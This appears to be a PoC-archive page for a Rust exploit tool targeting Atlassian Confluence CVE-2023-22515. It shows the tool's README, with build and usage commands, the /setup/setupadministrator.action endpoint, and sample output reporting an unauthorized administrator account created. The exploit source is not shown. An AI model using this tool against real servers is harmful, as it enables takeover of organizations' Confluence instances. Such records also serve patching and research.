CVE-2023-22515 PoC — Atlassian Confluence Server 安全漏洞

Source

https://github.com/killvxk/CVE-2023-22515-joaoviictorti

Associated Vulnerability

Title:Atlassian Confluence Server 安全漏洞 (CVE-2023-22515)
Description:Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能，并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server存在安全漏洞，该漏洞源于外部攻击者可能利用可公开访问的Confluence Data Center和Confluence Serve，用未知的漏洞来创建Confluence 管理员帐户并访问 Confluence 实例。

Description

CVE-2023-22515 (Confluence Broken Access Control Exploit)

Readme

# CVE-2023-22515

<p align="left">
	<a href="https://www.rust-lang.org/"><img src="https://img.shields.io/badge/made%20with-Rust-red"></a>
	<a href="#"><img src="https://img.shields.io/badge/platform-osx%2Flinux%2Fwindows-blueviolet"></a>
</p>

- [Overview](#overview)
- [Compile](#compile)
- [Usage](#usage)
- [Running CVE-2023-22515](#running-cve-2023-22515)

# Overview

Confluence is a web-based enterprise wiki developed by Australian software company Atlassian.
Atlassian has been made aware of an issue reported by some customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence server and data center instances to create unauthorized Confluence administrator accounts and access Confluence instances.

The vulnerability has been classified as ```CVE-2023-22515```

# Compile

First perform the compilation with the command:

```sh
cargo build --release
```

# Usage

You can do it in these two ways:
```sh
cargo run -- --target http://localhost --username "teste" --password "teste" 
```

```sh
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste" 
```

This will display help for the tool. Here are all the switches it supports:

```yaml
CVE-2023-22515

Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>

Options:
  -t, --target <TARGET>      Insert target
  -u, --username <USERNAME>  Insert username
  -p, --password <PASSWORD>  Insert password
  -h, --help                 Print help
```

# Running CVE-2023-22515

```console
cargo run -- --target http://example.com --username "teste" --password "teste" 

[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!
```

File Snapshot


 [4.0K]  /data/pocs/0ea5d13b490e65d1738207ff0efc59ea05d9258e
├── [ 32K]  Cargo.lock
├── [ 307]  Cargo.toml
├── [1.9K]  README.md
└── [4.0K]  src
    └── [3.3K]  main.rs

1 directory, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!